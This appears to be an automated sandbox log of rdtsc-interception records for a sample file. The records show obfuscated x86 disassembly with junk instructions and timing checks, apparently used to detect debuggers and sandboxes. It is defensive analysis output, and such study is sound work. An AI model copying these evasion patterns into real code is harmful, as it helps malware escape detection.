Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB039C second address: 4CB03E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDE8C51D4E0h 0x00000009 sbb si, 20E8h 0x0000000e jmp 00007FDE8C51D4DBh 0x00000013 popfd 0x00000014 movzx eax, bx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FDE8C51D4E7h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB03E1 second address: 4CB03F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB03F9 second address: 4CB046B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FDE8C51D4DDh 0x00000012 jmp 00007FDE8C51D4DBh 0x00000017 popfd 0x00000018 pushad 0x00000019 mov dx, si 0x0000001c mov ah, EBh 0x0000001e popad 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007FDE8C51D4DDh 0x00000027 xchg eax, ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FDE8C51D4DFh 0x00000031 or esi, 5F91B8FEh 0x00000037 jmp 00007FDE8C51D4E9h 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB046B second address: 4CB049E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDE8CE8B4D7h 0x00000008 mov ah, 69h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDE8CE8B4D1h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB049E second address: 4CB04A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB04A4 second address: 4CB04A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB04A8 second address: 4CB04D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007FDE8C51D4DFh 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDE8C51D4E5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB04D8 second address: 4CB050C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 call 00007FDE8CE8B4D3h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDE8CE8B4D5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB050C second address: 4CB0595 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FDE8C51D4DEh 0x0000000f lea eax, dword ptr [ebp-04h] 0x00000012 pushad 0x00000013 push ecx 0x00000014 pushfd 0x00000015 jmp 00007FDE8C51D4DDh 0x0000001a add ax, 9CC6h 0x0000001f jmp 00007FDE8C51D4E1h 0x00000024 popfd 0x00000025 pop eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushfd 0x00000029 jmp 00007FDE8C51D4E7h 0x0000002e xor ecx, 4B3DA3FEh 0x00000034 jmp 00007FDE8C51D4E9h 0x00000039 popfd 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0595 second address: 4CB05C0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDE8CE8B4D0h 0x00000008 xor cl, FFFFFFF8h 0x0000000b jmp 00007FDE8CE8B4CBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 nop 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 mov ch, 3Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB05C0 second address: 4CB066B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FDE8C51D4E3h 0x0000000c sub si, 136Eh 0x00000011 jmp 00007FDE8C51D4E9h 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FDE8C51D4E7h 0x00000020 sbb cx, 197Eh 0x00000025 jmp 00007FDE8C51D4E9h 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007FDE8C51D4E0h 0x00000031 add si, 2478h 0x00000036 jmp 00007FDE8C51D4DBh 0x0000003b popfd 0x0000003c popad 0x0000003d nop 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FDE8C51D4E0h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB066B second address: 4CB0671 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0671 second address: 4CB06A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, A5h 0x00000005 movsx edi, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f call 00007FDE8C51D4DEh 0x00000014 mov edx, esi 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 call 00007FDE8C51D4DDh 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB06D0 second address: 4CB06E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4D2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0748 second address: 4CB0757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0757 second address: 4CB078B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDE8CE8B4CFh 0x00000009 adc ax, 99DEh 0x0000000e jmp 00007FDE8CE8B4D9h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB078B second address: 4CB07DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop esi 0x00000008 pushad 0x00000009 pushad 0x0000000a mov cx, A19Fh 0x0000000e jmp 00007FDE8C51D4E4h 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FDE8C51D4E2h 0x0000001a jmp 00007FDE8C51D4E5h 0x0000001f popfd 0x00000020 popad 0x00000021 leave 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB07DF second address: 4CB07F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB07F2 second address: 4CB07F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB07F8 second address: 4CB07FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB07FC second address: 4CB0800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0800 second address: 4CA0206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c cmp eax, 00000000h 0x0000000f setne al 0x00000012 xor ebx, ebx 0x00000014 test al, 01h 0x00000016 jne 00007FDE8CE8B4C7h 0x00000018 xor eax, eax 0x0000001a sub esp, 08h 0x0000001d mov dword ptr [esp], 00000000h 0x00000024 mov dword ptr [esp+04h], 00000000h 0x0000002c call 00007FDE91284A87h 0x00000031 mov edi, edi 0x00000033 pushad 0x00000034 call 00007FDE8CE8B4D1h 0x00000039 pushfd 0x0000003a jmp 00007FDE8CE8B4D0h 0x0000003f jmp 00007FDE8CE8B4D5h 0x00000044 popfd 0x00000045 pop esi 0x00000046 mov edx, 35E87264h 0x0000004b popad 0x0000004c push ebx 0x0000004d pushad 0x0000004e mov edx, eax 0x00000050 push esi 0x00000051 pushfd 0x00000052 jmp 00007FDE8CE8B4D1h 0x00000057 adc eax, 4E0F7556h 0x0000005d jmp 00007FDE8CE8B4D1h 0x00000062 popfd 0x00000063 pop eax 0x00000064 popad 0x00000065 mov dword ptr [esp], ebp 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FDE8CE8B4CAh 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0206 second address: 4CA0218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8C51D4DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0218 second address: 4CA0244 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e jmp 00007FDE8CE8B4D4h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0244 second address: 4CA0248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0248 second address: 4CA0319 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push FFFFFFFEh 0x00000009 jmp 00007FDE8CE8B4D8h 0x0000000e call 00007FDE8CE8B4C9h 0x00000013 pushad 0x00000014 mov cx, 36BDh 0x00000018 movzx eax, dx 0x0000001b popad 0x0000001c push eax 0x0000001d jmp 00007FDE8CE8B4D4h 0x00000022 mov eax, dword ptr [esp+04h] 0x00000026 pushad 0x00000027 movsx edx, ax 0x0000002a call 00007FDE8CE8B4CAh 0x0000002f pop eax 0x00000030 popad 0x00000031 mov eax, dword ptr [eax] 0x00000033 jmp 00007FDE8CE8B4CCh 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c pushad 0x0000003d mov bx, 9ED4h 0x00000041 pushfd 0x00000042 jmp 00007FDE8CE8B4CDh 0x00000047 adc ecx, 2B838D96h 0x0000004d jmp 00007FDE8CE8B4D1h 0x00000052 popfd 0x00000053 popad 0x00000054 pop eax 0x00000055 pushad 0x00000056 mov bx, cx 0x00000059 mov di, cx 0x0000005c popad 0x0000005d push 2E8BCC65h 0x00000062 jmp 00007FDE8CE8B4CBh 0x00000067 xor dword ptr [esp], 5849E715h 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FDE8CE8B4D5h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0319 second address: 4CA0366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDE8C51D4E7h 0x00000009 add esi, 32D654DEh 0x0000000f jmp 00007FDE8C51D4E9h 0x00000014 popfd 0x00000015 movzx ecx, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr fs:[00000000h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0366 second address: 4CA036A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA036A second address: 4CA036E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA036E second address: 4CA0374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0374 second address: 4CA0382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8C51D4DAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0382 second address: 4CA03A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDE8CE8B4D3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03A0 second address: 4CA03A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03A6 second address: 4CA03AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03AA second address: 4CA03AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03AE second address: 4CA03DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FDE8CE8B4D7h 0x00000010 sub esp, 18h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ch, dh 0x00000018 mov eax, 3D5496E3h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03DE second address: 4CA03F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8C51D4E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03F6 second address: 4CA0450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FDE8CE8B4D6h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FDE8CE8B4D1h 0x00000019 sbb esi, 130059F6h 0x0000001f jmp 00007FDE8CE8B4D1h 0x00000024 popfd 0x00000025 push eax 0x00000026 push edx 0x00000027 mov ax, A13Dh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0450 second address: 4CA0489 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 111B1439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b jmp 00007FDE8C51D4E4h 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FDE8C51D4E7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0489 second address: 4CA055C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 call 00007FDE8CE8B4CBh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FDE8CE8B4D4h 0x00000016 xor ah, 00000008h 0x00000019 jmp 00007FDE8CE8B4CBh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FDE8CE8B4D8h 0x00000025 and esi, 4CBF7968h 0x0000002b jmp 00007FDE8CE8B4CBh 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, esi 0x00000033 jmp 00007FDE8CE8B4D6h 0x00000038 xchg eax, edi 0x00000039 jmp 00007FDE8CE8B4D0h 0x0000003e push eax 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007FDE8CE8B4D1h 0x00000046 xor esi, 7244B4E6h 0x0000004c jmp 00007FDE8CE8B4D1h 0x00000051 popfd 0x00000052 jmp 00007FDE8CE8B4D0h 0x00000057 popad 0x00000058 xchg eax, edi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c pushad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA055C second address: 4CA0561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0561 second address: 4CA05AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76C84538h] 0x0000000e jmp 00007FDE8CE8B4D0h 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 jmp 00007FDE8CE8B4D0h 0x0000001b xor eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA05AB second address: 4CA05AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA05AF second address: 4CA05B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA05B5 second address: 4CA05BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA05BC second address: 4CA0600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebp 0x00000008 jmp 00007FDE8CE8B4D8h 0x0000000d mov dword ptr [esp], eax 0x00000010 jmp 00007FDE8CE8B4D0h 0x00000015 lea eax, dword ptr [ebp-10h] 0x00000018 pushad 0x00000019 pushad 0x0000001a mov di, ax 0x0000001d mov ax, 187Fh 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0722 second address: 4CA0726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0726 second address: 4CA072C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA072C second address: 4CA074B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, D650h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C903E0 second address: 4C903EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C903EF second address: 4C904B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDE8C51D4DFh 0x00000008 pop ecx 0x00000009 movsx ebx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FDE8C51D4E0h 0x00000015 push eax 0x00000016 pushad 0x00000017 movsx edi, cx 0x0000001a pushfd 0x0000001b jmp 00007FDE8C51D4DAh 0x00000020 sbb cx, 9A58h 0x00000025 jmp 00007FDE8C51D4DBh 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FDE8C51D4DBh 0x00000034 or esi, 6251C11Eh 0x0000003a jmp 00007FDE8C51D4E9h 0x0000003f popfd 0x00000040 popad 0x00000041 mov ebp, esp 0x00000043 jmp 00007FDE8C51D4DEh 0x00000048 sub esp, 2Ch 0x0000004b pushad 0x0000004c movzx eax, dx 0x0000004f push edi 0x00000050 pushfd 0x00000051 jmp 00007FDE8C51D4E6h 0x00000056 sbb esi, 29524978h 0x0000005c jmp 00007FDE8C51D4DBh 0x00000061 popfd 0x00000062 pop eax 0x00000063 popad 0x00000064 push ebp 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C904B4 second address: 4C904BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C905BC second address: 4C90657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 sub edi, edi 0x00000008 jmp 00007FDE8C51D4E5h 0x0000000d inc ebx 0x0000000e jmp 00007FDE8C51D4DEh 0x00000013 test al, al 0x00000015 pushad 0x00000016 push ecx 0x00000017 pushfd 0x00000018 jmp 00007FDE8C51D4DDh 0x0000001d or eax, 5B07C516h 0x00000023 jmp 00007FDE8C51D4E1h 0x00000028 popfd 0x00000029 pop esi 0x0000002a call 00007FDE8C51D4E1h 0x0000002f pop ebx 0x00000030 popad 0x00000031 je 00007FDE8C51D730h 0x00000037 jmp 00007FDE8C51D4DAh 0x0000003c lea ecx, dword ptr [ebp-14h] 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 movsx ebx, cx 0x00000045 call 00007FDE8C51D4E6h 0x0000004a pop eax 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90657 second address: 4C9065D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C9068B second address: 4C9068F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C9068F second address: 4C90695 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90695 second address: 4C90703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push ecx 0x0000000c movsx edx, si 0x0000000f pop eax 0x00000010 call 00007FDE8C51D4DFh 0x00000015 mov ax, 92EFh 0x00000019 pop esi 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov eax, edi 0x00000021 pushfd 0x00000022 jmp 00007FDE8C51D4E3h 0x00000027 add si, 812Eh 0x0000002c jmp 00007FDE8C51D4E9h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90703 second address: 4C90713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90713 second address: 4C90776 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDE8C51D4E4h 0x00000013 sbb cx, 9908h 0x00000018 jmp 00007FDE8C51D4DBh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007FDE8C51D4E6h 0x00000026 sub ax, 3B68h 0x0000002b jmp 00007FDE8C51D4DBh 0x00000030 popfd 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90776 second address: 4C90793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call dword ptr [76C886D4h] 0x0000000b mov edi, edi 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 push FFFFFFFEh 0x00000012 push 774FCA08h 0x00000017 push 7746AE00h 0x0000001c mov eax, dword ptr fs:[00000000h] 0x00000022 push eax 0x00000023 sub esp, 0Ch 0x00000026 push ebx 0x00000027 push esi 0x00000028 push edi 0x00000029 mov eax, dword ptr [7751B370h] 0x0000002e xor dword ptr [ebp-08h], eax 0x00000031 xor eax, ebp 0x00000033 push eax 0x00000034 lea eax, dword ptr [ebp-10h] 0x00000037 mov dword ptr fs:[00000000h], eax 0x0000003d mov dword ptr [ebp-18h], esp 0x00000040 mov eax, dword ptr fs:[00000018h] 0x00000046 test eax, eax 0x00000048 je 00007FDE8CECEB11h 0x0000004e mov dword ptr [ebp-04h], 00000000h 0x00000055 mov edx, dword ptr [ebp+08h] 0x00000058 mov dword ptr [eax+00000BF4h], edx 0x0000005e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000065 test edx, edx 0x00000067 je 00007FDE8CE8B569h 0x0000006d xor edx, edx 0x0000006f jmp 00007FDE8CE8B4A8h 0x00000071 mov eax, edx 0x00000073 mov ecx, dword ptr [ebp-10h] 0x00000076 mov dword ptr fs:[00000000h], ecx 0x0000007d pop ecx 0x0000007e pop edi 0x0000007f pop esi 0x00000080 pop ebx 0x00000081 mov esp, ebp 0x00000083 pop ebp 0x00000084 retn 0004h 0x00000087 push eax 0x00000088 push edx 0x00000089 jmp 00007FDE8CE8B4D0h 0x0000008e rdtsc
